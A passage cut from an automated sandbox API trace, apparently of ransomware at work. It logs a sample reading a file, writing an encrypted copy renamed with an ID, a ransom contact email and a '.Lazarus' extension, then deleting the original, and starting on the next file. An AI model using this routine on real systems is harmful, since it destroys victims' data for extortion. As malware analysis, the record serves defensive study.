returned 0x693f0 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0073.710] AreFileApisANSI () returned 1 [0073.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0073.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xca) returned 0x74a18 [0073.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x74a18, cchWideChar=101 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 101 [0073.710] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.710] GetFileType (hFile=0x428) returned 0x1 [0073.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74a18 | out: hHeap=0x20000) returned 1 [0073.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0073.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.710] AreFileApisANSI () returned 1 [0073.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cdf0 [0073.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x6cdf0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.711] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.711] GetFileType (hFile=0x410) returned 0x1 [0073.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.711] GetLastError () returned 0x0 [0073.711] SetLastError (dwErrCode=0x0) [0073.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.711] GetLastError () returned 0x0 [0073.711] SetLastError (dwErrCode=0x0) [0073.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0073.711] ReadFile (in: hFile=0x410, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0073.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0073.713] GetLastError () returned 0x0 [0073.714] SetLastError (dwErrCode=0x0) [0073.714] GetLastError () returned 0x0 [0073.714] SetLastError (dwErrCode=0x0) [0073.714] GetLastError () returned 0x0 [0073.714] SetLastError (dwErrCode=0x0) [0073.714] GetLastError () returned 0x0 [0073.714] SetLastError (dwErrCode=0x0) [0073.714] ReadFile (in: hFile=0x410, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.871] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.872] GetLastError () returned 0x0 [0073.872] SetLastError (dwErrCode=0x0) [0073.872] GetLastError () returned 0x0 [0073.872] SetLastError (dwErrCode=0x0) [0073.872] GetLastError () returned 0x0 [0073.872] SetLastError (dwErrCode=0x0) [0073.873] GetLastError () returned 0x0 [0073.873] SetLastError (dwErrCode=0x0) [0073.873] ReadFile (in: hFile=0x410, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.873] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.873] GetLastError () returned 0x0 [0073.873] SetLastError (dwErrCode=0x0) [0073.873] GetLastError () returned 0x0 [0073.873] SetLastError (dwErrCode=0x0) [0073.873] GetLastError () returned 0x0 [0073.873] SetLastError (dwErrCode=0x0) [0073.873] GetLastError () returned 0x0 [0073.874] SetLastError (dwErrCode=0x0) [0073.874] ReadFile (in: hFile=0x410, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0xef6, lpOverlapped=0x0) returned 1 [0073.874] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.874] GetLastError () returned 0x0 [0073.874] SetLastError (dwErrCode=0x0) [0073.874] GetLastError () returned 0x0 [0073.874] SetLastError (dwErrCode=0x0) [0073.874] GetLastError () returned 0x0 [0073.874] SetLastError (dwErrCode=0x0) [0073.874] ReadFile (in: hFile=0x410, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.874] GetLastError () returned 0x0 [0073.874] SetLastError (dwErrCode=0x0) [0073.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7d0a0 [0073.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0073.875] GetLastError () returned 0x0 [0073.875] SetLastError (dwErrCode=0x0) [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0073.875] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xf00, lpOverlapped=0x0) returned 1 [0073.875] GetLastError () returned 0x0 [0073.875] SetLastError (dwErrCode=0x0) [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.875] GetLastError () returned 0x0 [0073.875] SetLastError (dwErrCode=0x0) [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0073.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0073.875] CloseHandle (hObject=0x428) returned 1 [0073.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0073.877] CloseHandle (hObject=0x410) returned 1 [0073.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0073.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0073.877] AreFileApisANSI () returned 1 [0073.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0073.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.877] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.878] GetFileType (hFile=0x410) returned 0x1 [0073.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0073.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0073.878] GetLastError () returned 0xb7 [0073.878] SetLastError (dwErrCode=0xb7) [0073.878] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0073.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0073.879] CloseHandle (hObject=0x410) returned 1 [0073.880] AreFileApisANSI () returned 1 [0073.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d0b0 [0073.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.880] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0073.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.881] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x1, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0073.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0073.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.882] AreFileApisANSI () returned 1 [0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\DisplayIcon.ico", lpUsedDefaultChar=0x0) returned 38 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0073.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.882] AreFileApisANSI () returned 1 [0073.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cd40 [0073.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0073.883] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.883] GetFileType (hFile=0x410) returned 0x1 [0073.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0073.883] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0073.883] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0073.883] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0073.884] CloseHandle (hObject=0x410) returned 1 [0073.884] AreFileApisANSI () returned 1 [0073.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d0b0 [0073.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0073.884] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.884] GetFileType (hFile=0x410) returned 0x1 [0073.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0073.884] CloseHandle (hObject=0x410) returned 1 [0073.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0073.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0073.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.885] AreFileApisANSI () returned 1 [0073.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cd40 [0073.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0073.885] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5)) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0073.885] AreFileApisANSI () returned 1 [0073.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.885] HeapFree (in: hHeap=0x20000, 